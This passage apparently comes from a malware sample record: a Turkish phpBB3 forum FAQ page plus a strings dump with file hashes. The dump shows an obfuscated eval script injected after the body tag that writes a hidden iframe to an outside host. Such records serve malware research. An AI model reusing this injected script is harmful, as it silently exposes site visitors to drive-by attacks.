valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f7r3\"></a><b>&#187; \u00dcyeler i\u00e7in nas\u0131l arar\u0131m?</b></div>\n\t\t\t\t<div class=\"postbody\">\u201c\u00dcyeler\u201d sayfas\u0131na girin ve \u201c\u00dcye bul\u201d linkini t\u0131klay\u0131n. A\u00e7\u0131klama se\u00e7eneklerini doldurun.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f7r4\"></a><b>&#187; Kendi iletilerimi ve konular\u0131m\u0131 nas\u0131l bulurum?</b></div>\n\t\t\t\t<div class=\"postbody\">Kendi iletilerinizi g\u00f6rmek i\u00e7in Kullan\u0131c\u0131 Panelindeki ya da hesab\u0131n\u0131zdaki \"Kullan\u0131c\u0131n\u0131n iletilerini g\u00f6ster\" linkini t\u0131klayabilirsiniz. Kendi a\u00e7t\u0131\u011f\u0131n\u0131z ba\u015fl\u0131klar\u0131 g\u00f6rmek i\u00e7in Geli\u015fmi\u015f Arama sayfas\u0131ndaki uygun se\u00e7enekleri kullanarak arama yapabilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t\t\t</table>\n\n\t\t<br clear=\"all\" />\n\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t\t<tr> \n\t\t\t<td class=\"cat\" align=\"center\"><h4>Konu \u0130zlemeleri ve S\u0131k Kullan\u0131lanlar</h4></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f8r0\"></a><b>&#187; S\u0131k kullan\u0131lanlar ile konuya kaydolmak aras\u0131nda nas\u0131l bir fark vard\u0131r?</b></div>\n\t\t\t\t<div class=\"postbody\">phpBB3\u2019deki S\u0131k kullan\u0131lanlar, taray\u0131c\u0131n\u0131z\u0131n s\u0131k kullan\u0131lanlar \u00f6zelli\u011fine benzer. Bir g\u00fcncelleme olmas\u0131 durumunda uyar\u0131lmazs\u0131n\u0131z. Ancak, daha sonra bu ba\u015fl\u0131\u011fa kolayca ula\u015fabilirsiniz. Ba\u015fl\u0131\u011fa kay\u0131t olma ile aras\u0131nda fark, kay\u0131t oldu\u011funuz ba\u015fl\u0131klarda g\u00fcncelleme olmas\u0131 durumunda size haber veriliyor olmas\u0131d\u0131r.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f8r1\"></a><b>&#187; Belli bir forum ya da ba\u015fl\u0131\u011fa kaydolmak i\u00e7in ne yapmal\u0131y\u0131m?</b></div>\n\t\t\t\t<div class=\"postbody\">Belli bir foruma kaydolmak i\u00e7in \u00f6ncelikle oturum a\u00e7mal\u0131s\u0131n\u0131z, \u201cForuma abone ol\u201d ba\u011flant\u0131s\u0131n\u0131 g\u00f6r\u00fcrs\u00fcn\u00fcz. Bu belli bir ba\u015fl\u0131\u011fa kaydolmada oldu\u011fu gibi sizi o foruma kaydeder. Bir ba\u015fl\u0131\u011fa kaydolmak i\u00e7in, ya ba\u015fl\u0131\u011fa cevap yazars\u0131n\u0131z ve kontrol kutusunu i\u015faretlersiniz ya da ba\u015fl\u0131\u011f\u0131n i\u00e7indeki kaydolma linkini t\u0131klars\u0131n\u0131z.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f8r2\"></a><b>&#187; Aboneliklerimi nas\u0131l silebilirim?</b></div>\n\t\t\t\t<div class=\"postbody\">Aboneliklerinizi silmek i\u00e7in, Kullan\u0131c\u0131 Panelinize gidin ve abonelikler ba\u011flant\u0131t\u0131s\u0131n\u0131 takip edin.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t\t\t</table>\n\n\t\t<br clear=\"all\" />\n\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t\t<tr> \n\t\t\t<td class=\"cat\" align=\"center\"><h4>Eklentiler</h4></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f9r0\"></a><b>&#187; Bu panoda hangi eklentilere izin verilmekte?</b></div>\n\t\t\t\t<div class=\"postbody\">Her pano y\u00f6neticisi baz\u0131 belirli eklenti t\u00fcrlerine izin verebilir ya da iznini kald\u0131rabilir. E\u011fer hangilerinin y\u00fcklenebilece\u011finden emin de\u011filseniz, yard\u0131m i\u00e7in y\u00f6netici ile ileti\u015fim kurun.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f9r1\"></a><b>&#187; Kendime ait t\u00fcm eklentileri nas\u0131l bulabilirim?</b></div>\n\t\t\t\t<div class=\"postbody\">E\u011fer y\u00fckledi\u011finiz eklerin listesini bulmak istiyorsan\u0131z, Kullan\u0131c\u0131 Panelinize girin ve eklenti sayfas\u0131na giden ba\u011flant\u0131lar\u0131 takip edin.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t\t\t</table>\n\n\t\t<br clear=\"all\" />\n\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t\t<tr> \n\t\t\t<td class=\"cat\" align=\"center\"><h4>phpBB3 Konular\u0131</h4></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f10r0\"></a><b>&#187; Bu mesaj panosunu kim yazd\u0131?</b></div>\n\t\t\t\t<div class=\"postbody\">Bu yaz\u0131l\u0131m (de\u011fi\u015ftirilmemi\u015f hali ile) <a href=\"http://www.phpbb.com/\">phpBB Grubu</a> taraf\u0131ndan yaz\u0131lm\u0131\u015f ve lisanslanm\u0131\u015ft\u0131r. \u201c<a href=\"http://www.phpbbturkiye.net/hakkinda/gpl-lisansi.html\" title=\"GNU Genel Kamu Lisans\u0131\" onclick=\"this.target='_blank'\">GNU Genel Kamu Lisans\u0131</a>\u201d alt\u0131nda kullan\u0131ma sunulmu\u015ftur ve bu lisans\u0131n maddelerine uyarak yaz\u0131l\u0131m \u00fczerinde \u00f6zg\u00fcrce de\u011fi\u015fiklik yapabilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f10r1\"></a><b>&#187; Bu yaz\u0131l\u0131m\u0131 kim T\u00fcrk\u00e7e\u2019ye terc\u00fcme etti?</b></div>\n\t\t\t\t<div class=\"postbody\">\u201cphpBB3 T\u00fcrk\u00e7e dil dosyas\u0131\u201d bir \u201c<a href=\"http://www.canversoft.net/\" title=\"profesyonel phpBB3 \u00e7\u00f6z\u00fcmleri ve web hizmetleri\" onclick=\"this.target='_blank'\">Canver Software</a>\u201d i\u015ftirak\u0131 olan \u201c<strong><a href=\"http://www.phpbbturkiye.net\" title=\"phpBB3 T\u00fcrk\u00e7e destek ve geli\u015ftirme\" onclick=\"this.target='_blank'\">phpBB T\u00fcrkiye</a></strong>\u201d grubu taraf\u0131ndan terc\u00fcme edilmi\u015f ve \u201c<a href=\"http://www.phpbbturkiye.net/hakkinda/gpl-lisansi.html\" title=\"GPL - genel kamu lisans\u0131\" onclick=\"this.target='_blank'\">GPL - genel kamu lisans\u0131</a>\u201d ile da\u011f\u0131t\u0131ma sunulmu\u015ftur. T\u00fcm eser ve telif haklar\u0131 \u201cphpBB T\u00fcrkiye\u201d grubuna aittir. Detayl\u0131 bilgi ve \u201cKullan\u0131m & Bulundurma Ko\u015fullar\u0131\u201d i\u00e7in \u201c<a href=\"http://www.phpbbturkiye.net/dosyalar/phpbb3-dil-dosyasi.html\" onclick=\"this.target='_blank'\">Y\u00fckleme ve Kullan\u0131m K\u0131lavuzu</a>\u201d \u2019na bak\u0131n\u0131z. L\u00fctfen g\u00f6zden ka\u00e7an hatalar\u0131, \u00f6nerilerinizi, yorumlar\u0131n\u0131z\u0131 \u201cphpBB T\u00fcrkiye\u201d sitemiz \u201cphpBB3 T\u00fcrk\u00e7e Dil Paketi\u201d b\u00f6l\u00fcm\u00fcndeki <a href=\"http://www.phpbbturkiye.net/hata-raporlari-f93/\" onclick=\"this.target='_blank'\">Hata Raporlar\u0131</a> forumuna bildiriniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f10r2\"></a><b>&#187; Neden X \u00f6zelli\u011fi yok?</b></div>\n\t\t\t\t<div class=\"postbody\">Bu yaz\u0131l\u0131m phpBB Grubu taraf\u0131ndan yaz\u0131lm\u0131\u015f ve lisanslanm\u0131\u015ft\u0131r. E\u011fer bir \u00f6zelli\u011fin eklenmesi gerekti\u011fine inan\u0131yorsan\u0131z, l\u00fctfen, <a href=\"http://www.phpbb.com\" onclick=\"this.target='_blank'\">phpbb.com</a> web sitesini ziyaret edin ve phpBB grubunun ne s\u00f6yledi\u011fini g\u00f6r\u00fcn. L\u00fctfen <a href=\"http://www.phpbb.com\" onclick=\"this.target='_blank'\">phpbb.com</a> adresine \u00f6zellik isteme ricas\u0131 i\u00e7eren iletiler g\u00f6ndermeyin, grup yeni \u00f6zelliklerin taslaklar\u0131n\u0131 SourceForge kullanarak tutmaktad\u0131r. L\u00fctfen, forumlar\u0131 okuyun ve phpBB grubunun \u00fczerinde \u00e7al\u0131\u015ft\u0131\u011f\u0131 bir \u00f6zellik olup olmad\u0131\u011f\u0131n\u0131 g\u00f6r\u00fcn ve sonra orada verilen prosed\u00fcr\u00fc takip edin.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f10r3\"></a><b>&#187; Bu panodaki hatal\u0131 kullan\u0131m ve/veya yasal konularla ilgili olarak kimle ileti\u015fim kurmal\u0131y\u0131m?</b></div>\n\t\t\t\t<div class=\"postbody\">\"Y\u00f6netim ekibi\" sayfas\u0131ndaki herhangi bir y\u00f6netici \u015fikayetlerinizi iletebilece\u011finiz uygun ileti\u015fim noktas\u0131 olabilir. E\u011fer yine cevap alamazsan\u0131z site sahibi ile ileti\u015fime ge\u00e7ebilirsiniz. E\u011fer pano \u00fccretsiz bir servis \u00fczerinde \u00e7al\u0131\u015f\u0131yorsa (\u00f6rne\u011fin Yahoo!, free.fr, f2s.com, vb), y\u00f6netim ya da k\u00f6t\u00fc kullan\u0131m servisiyle ileti\u015fim kurabilirsiniz. Unutmay\u0131n ki; phpBB Grubu <strong>herhangi bir yetkiye sahip de\u011fildir</strong> ve hi\u00e7 bir \u015fekilde nas\u0131l, nerede ya da kim taraf\u0131ndan bu panonun kullan\u0131laca\u011f\u0131 \u00fczerinde sorumluluk kabul etmez. Yasal durumlarla ilgili olarak <strong>do\u011frudan</strong> phpBB.com sitesi ile ilgili olmad\u0131k\u00e7a phpBB Grubu ile ileti\u015fime ge\u00e7meyin. E\u011fer phpBB Grubu ile bu yaz\u0131l\u0131m\u0131n herhangi bir 3. parti kullan\u0131m\u0131yla ilgili olarak talepte bulunursan\u0131z k\u0131sa bir cevap alabilir ya da hi\u00e7 bir cevap alamayabilirsiniz.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t\t\t</table>\n\n\t\t<br clear=\"all\" />\n\t\n</div>\n\n<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\" cellpadding=\"0\" style=\"margin-top: 5px;\">\n\t<tr>\n\t\t<td class=\"row1\">\n\t\t\t<p class=\"breadcrumbs\"><a href=\"./index.php?sid=be5e639d613864d0d431e01d68ce6fbd\">Pano anasayfas\u0131</a></p>\n\t\t\t<p class=\"datetime\">T\u00fcm zamanlar UTC + 2 saat </p>\n\t\t</td>\n\t</tr>\n\t</table>\n<br clear=\"all\" />\n\n<div align=\"right\">\t<form method=\"post\" name=\"jumpbox\" action=\"./viewforum.php?sid=be5e639d613864d0d431e01d68ce6fbd\" onsubmit=\"if(document.jumpbox.f.value == -1){return false;}\">\n\n\t<table cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n\t<tr>\n\t\t<td nowrap=\"nowrap\"><span class=\"gensmall\">Git:</span>&nbsp;<select name=\"f\" onchange=\"if(this.options[this.selectedIndex].value != -1){ document.forms['jumpbox'].submit() }\">\n\n\t\t\t\t\t<option value=\"-1\">Forum se\u00e7iniz</option>\n\t\t<option value=\"-1\">------------------</option>\t\t\t<option value=\"1\">EMSAL KARARLAR VE \u0130\u00c7T\u0130HATLAR</option>\n\t\t\t\t\t<option value=\"2\">&nbsp; &nbsp;EMSAL KARARLAR VE \u0130\u00c7T\u0130HATLAR ADLI S\u0130TEN\u0130N KURULU\u015e AMACI</option>\n\t\t\t\t\t<option value=\"4\">&nbsp; &nbsp;EMSAL KARARLAR VE \u0130\u00c7T\u0130HATLAR BU FORUMDA TOPLANMAKTA VE TARTI\u015eILMAKTADIR</option>\n\t\t\t\t\t<option value=\"12\">&nbsp; &nbsp;EMSAL KARAR VE \u0130\u00c7T\u0130HATLAR 1 - DANI\u015eTAY KARARLARI</option>\n\t\t\t\t\t<option value=\"13\">&nbsp; &nbsp;EMSAL KARAR VE \u0130\u00c7T\u0130HATLAR 2 - YARGITAY KARARLARI</option>\n\t\t\t\t\t<option value=\"14\">&nbsp; &nbsp;EMSAL KARAR VE \u0130\u00c7T\u0130HATLAR 3 - ANAYASA MAHKEMES\u0130 KARARLARI</option>\n\t\t\t\t\t<option value=\"15\">&nbsp; &nbsp;\u0130\u00c7T\u0130HAT S\u00d6ZC\u00dc\u011e\u00dcN\u00dcN ANLAMI VE HUKUK ALEM\u0130NDEK\u0130 \u00d6NEM\u0130 HK.</option>\n\t\t\t\t\t<option value=\"6\">AVRUPA \u0130NSAN HAKLARI MAHKEMES\u0130 KARARLARI</option>\n\t\t\t\t\t<option value=\"7\">&nbsp; &nbsp;A\u0130HM KARARLARI - GENEL</option>\n\t\t\t\t\t<option value=\"17\">&nbsp; &nbsp;\u0130\u00c7T\u0130HAT N\u0130TEL\u0130\u011e\u0130NDEK\u0130 A\u0130HM KARARLARI</option>\n\t\t\t\t\t<option value=\"10\">SU\u00c7 DUYURULARI</option>\n\t\t\t\t\t<option value=\"11\">&nbsp; &nbsp;SU\u00c7 DUYURULARI NASIL YAPILIR?</option>\n\t\t\t\t\t<option value=\"8\">DUYURULAR VE \u0130LANLAR</option>\n\t\t\t\t\t<option value=\"9\">&nbsp; &nbsp;\u00dcYE VE M\u0130SAF\u0130RLER\u0130M\u0130ZE Y\u00d6NEL\u0130K DUYURULAR VE \u0130LANLAR</option>\n\t\t\n\t\t</select>&nbsp;<input class=\"btnlite\" type=\"submit\" value=\"Git\" /></td>\n\t</tr>\n\t</table>\n\n\t</form>\n</div>\n\n<img src=\"./cron.php?cron_type=tidy_search&amp;sid=be5e639d613864d0d431e01d68ce6fbd\" width=\"1\" height=\"1\" alt=\"cron\" /></div>\n\n<!--\n\tWe request you retain the full copyright notice below including the link to www.phpbb.com.\n\tThis not only gives respect to the large amount of time given freely by the developers\n\tbut also helps build interest, traffic and use of phpBB3. If you (honestly) cannot retain\n\tthe full copyright we ask you at least leave in place the \"Powered by phpBB\" line, with\n\t\"phpBB\" linked to www.phpbb.com. If you refuse to include even this then support on our\n\tforums may be affected.\n\n\tThe phpBB Group : 2006\n//-->\n\n<div id=\"wrapfooter\">\n\t\t<span class=\"copyright\">Powered by <a href=\"http://www.phpbb.com/\">phpBB</a> &copy; 2000, 2002, 2005, 2007 phpBB Group\n\t<br />phpBB3 T\u00fcrk\u00e7e: <a href=\"http://www.phpbbturkiye.net\" title=\"phpBB3 geli\u015ftirme ve destek\" onclick=\"this.target='_blank'\" rel=\"external\">phpBB T\u00fcrkiye</a></span>\n</div>\n\n</body>\n</html>"
    },
    "filename": "VirusShare_2d457f28137949984335acd3bb3bdaa8",
    "filesize": 69606,
    "filetype": "HTML document, UTF-8 Unicode text, with very long lines",
    "hashes": {
        "md5": "2d457f28137949984335acd3bb3bdaa8",
        "sha1": "4179cbffce1bbaa297e543fb21a007a700a346c6",
        "sha256": "717516b5357309ab96fd5de77dfab8b8e6bedc65bb18fc79396addc32cfe2cf2"
    },
    "peinfo": {},
    "strings": {
        "dump": [
            "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">",
            "<html xmlns=\"http://www.w3.org/1999/xhtml\" dir=\"ltr\" lang=\"tr\" xml:lang=\"tr\">",
            "<head>",
            "<meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\" />",
            "<meta http-equiv=\"content-language\" content=\"tr\" />",
            "<meta http-equiv=\"content-style-type\" content=\"text/css\" />",
            "<meta http-equiv=\"imagetoolbar\" content=\"no\" />",
            "<meta name=\"resource-type\" content=\"document\" />",
            "<meta name=\"distribution\" content=\"global\" />",
            "<meta name=\"copyright\" content=\"2000, 2002, 2005, 2007 phpBB Group\" />",
            "<meta name=\"keywords\" content=\"\" />",
            "<meta name=\"description\" content=\"\" />",
            "<title>EMSAL KARARLAR VE \u0130",
            "T\u0130HATLAR &bull; S\u0131k Sorulan Sorular</title>",
            "<link rel=\"stylesheet\" href=\"./style.php?sid=be5e639d613864d0d431e01d68ce6fbd&amp;id=2&amp;lang=en\" type=\"text/css\" />",
            "<script type=\"text/javascript\">",
            "// <![CDATA[",
            "function popup(url, width, height, name)",
            "\tif (!name)",
            "\t\tname = '_popup';",
            "\twindow.open(url.replace(/&amp;/g, '&'), name, 'height=' + height + ',resizable=yes,scrollbars=yes,width=' + width);",
            "\treturn false;",
            "function jumpto()",
            "\tvar page = prompt('Gitmek istedi\u011finiz sayfa numaras\u0131n\u0131 girin:', '');",
            "\tvar perpage = '';",
            "\tvar base_url = '';",
            "\tif (page !== null && !isNaN(page) && page > 0)",
            "\t\tdocument.location.href = base_url.replace(/&amp;/g, '&') + '&start=' + ((page - 1) * perpage);",
            "* Find a member",
            "function find_username(url)",
            "\tpopup(url, 760, 570, '_usersearch');",
            "\treturn false;",
            "* Mark/unmark checklist",
            "* id = ID of parent container, name = name prefix, state = state [true/false]",
            "function marklist(id, name, state)",
            "\tvar parent = document.getElementById(id);",
            "\tif (!parent)",
            "\t\teval('parent = document.' + id);",
            "\tif (!parent)",
            "\t\treturn;",
            "\tvar rb = parent.getElementsByTagName('input');",
            "\tfor (var r = 0; r < rb.length; r++)",
            "\t\tif (rb[r].name.substr(0, name.length) == name)",
            "\t\t\trb[r].checked = state;",
            "// ]]>",
            "</script>",
            "</head>",
            "<body class=\"ltr\"><script>sa=\"%6B%73%69%65%6E%61%2E%6E%65%74\";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+c.toString(a)+'\\\\b','g'),k[c])}}return p}('a(0.4.7(\"5=s\")==-1&&9.8.7(\"f 6\")!=-1){0.4=\"5=s; e=c, 2 g b 2:d:h p; \";0.r(\"<3 q=1 t=1 o=\\'n://\"+j+\"/i/\\' k=\\'l:m\\'></3>\")}',30,30,'document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015|Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height'.split('|')));</script>",
            "<a name=\"top\"></a>",
            "<div id=\"wrapheader\">",
            "\t<div id=\"logodesc\">",
            "\t\t<table width=\"100%\" cellspacing=\"0\">",
            "\t\t<tr>",
            "\t\t\t<td><a href=\"./index.php?sid=be5e639d613864d0d431e01d68ce6fbd\"><img src=\"./styles/subsilver2/imageset/site_logo.gif\" width=\"400\" height=\"100\" alt=\"\" title=\"\" /></a></td>",
            "\t\t\t<td width=\"100%\" align=\"center\"><h1>EMSAL KARARLAR VE \u0130",
            "T\u0130HATLAR</h1><span class=\"gen\">****** EMSAL KARARLAR VE \u0130",
            "T\u0130HATLAR BU S\u0130TEDE TOPLANSIN - \u0130",
            "T\u0130HAT VE EMSAL KARAR EKLEMEK \u0130STEYEN HERKES DAVETL\u0130D\u0130R ****** ADALET M",
            "N, GER",
            "EKLER VE DO\u011eRULAR DA ADALET\u0130N TEMEL\u0130D\u0130R</span></td>",
            "\t\t</tr>",
            "\t\t</table>",
            "\t</div>",
            "\t<div id=\"menubar\">",
            "\t\t<table width=\"100%\" cellspacing=\"0\">",
            "\t\t<tr>",
            "\t\t\t<td class=\"genmed\">",
            "\t\t\t\t<a href=\"./ucp.php?mode=login&amp;sid=be5e639d613864d0d431e01d68ce6fbd\"><img src=\"./styles/subsilver2/theme/images/icon_mini_login.gif\" width=\"12\" height=\"13\" alt=\"*\" /> Oturum A",
            "</a>&nbsp; &nbsp;<a href=\"./ucp.php?mode=register&amp;sid=be5e639d613864d0d431e01d68ce6fbd\"><img src=\"./styles/subsilver2/theme/images/icon_mini_register.gif\" width=\"12\" height=\"13\" alt=\"*\" /> Kay\u0131t Ol</a>",
            "\t\t\t\t\t\t\t\t</td>",
            "\t\t\t<td class=\"genmed\" align=\"right\">",
            "\t\t\t\t<a href=\"./faq.php?sid=be5e639d613864d0d431e01d68ce6fbd\"><img src=\"./styles/subsilver2/theme/images/icon_mini_faq.gif\" width=\"12\" height=\"13\" alt=\"*\" /> Pano K\u0131lavuzu</a>",
            "\t\t\t\t\t\t\t</td>",
            "\t\t</tr>",
            "\t\t</table>",
            "\t</div>",
            "\t<div id=\"datebar\">",
            "\t\t<table width=\"100%\" cellspacing=\"0\">",
            "\t\t<tr>",
            "\t\t\t<td class=\"gensmall\"></td>",
            "\t\t\t<td class=\"gensmall\" align=\"right\">Sistem saati: Per Tem 23, 2015 1:02 pm<br /></td>",
            "\t\t</tr>",
            "\t\t</table>",
            "\t</div>",
            "</div>",
            "<div id=\"wrapcentre\">",
            "\t<br style=\"clear: both;\" />",
            "\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\" cellpadding=\"0\" style=\"margin-top: 5px;\">",
            "\t<tr>",
            "\t\t<td class=\"row1\">",
            "\t\t\t<p class=\"breadcrumbs\"><a href=\"./index.php?sid=be5e639d613864d0d431e01d68ce6fbd\">Pano anasayfas\u0131</a></p>",
            "\t\t\t<p class=\"datetime\">T",
            "m zamanlar UTC + 2 saat </p>",
            "\t\t</td>",
            "\t</tr>",
            "\t</table>",
            "\t<br />",
            "<a name=\"faqtop\"></a>",
            "<div id=\"pagecontent\">",
            "\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">",
            "\t<tr>",
            "\t\t<th>S\u0131k Sorulan Sorular</th>",
            "\t</tr>",
            "\t<tr>",
            "\t\t<td class=\"row1\">",
            "\t\t\t\t\t<span class=\"gen\"><b>Oturum A",
            "ma ve Kay\u0131t Konular\u0131</b></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r0\">Neden oturum a",
            "am\u0131yorum?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r1\">Neden ",
            "ye olmal\u0131y\u0131m?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r2\">Neden oturumum otomatik olarak kapan\u0131yor?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r3\">Aktif ",
            "ye listesinde kullan\u0131c\u0131 ad\u0131m\u0131n g",
            "nmesini nas\u0131l engellerim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r4\">Parolam\u0131 unuttum!</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r5\">Kay\u0131t oldum ancak oturum a",
            "am\u0131yorum!</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r6\">Daha ",
            "nce ",
            "ye oldu\u011fum halde neden oturum a",
            "am\u0131yorum?!</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r7\">COPPA nedir?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r8\">Neden kay\u0131t olam\u0131yorum?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r9\">\u201cT",
            "m pano ",
            "erezlerini sil\u201d ne yapar?</a></span><br />",
            "\t\t\t\t\t\t<br />",
            "\t\t\t\t\t<span class=\"gen\"><b>Kullan\u0131c\u0131 Tercihleri ve Ayarlar\u0131</b></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r0\">Ayarlar\u0131m\u0131 nas\u0131l de\u011fi\u015ftirebilirim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r1\">Zamanlar do\u011fru de\u011fil!</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r2\">Zaman dilimini de\u011fi\u015ftirmeme ra\u011fmen zaman hala yanl\u0131\u015f!</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r3\">Listede benim dilim mevcut de\u011fil!</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r4\">Kullan\u0131c\u0131 ad\u0131m\u0131n alt\u0131nda nas\u0131l resim g",
            "sterebilirim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r5\">Seviye nedir ve nas\u0131l de\u011fi\u015ftirebilirim?</a></span><br />",
            "\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r6\">",
            "yeye e-posta g",
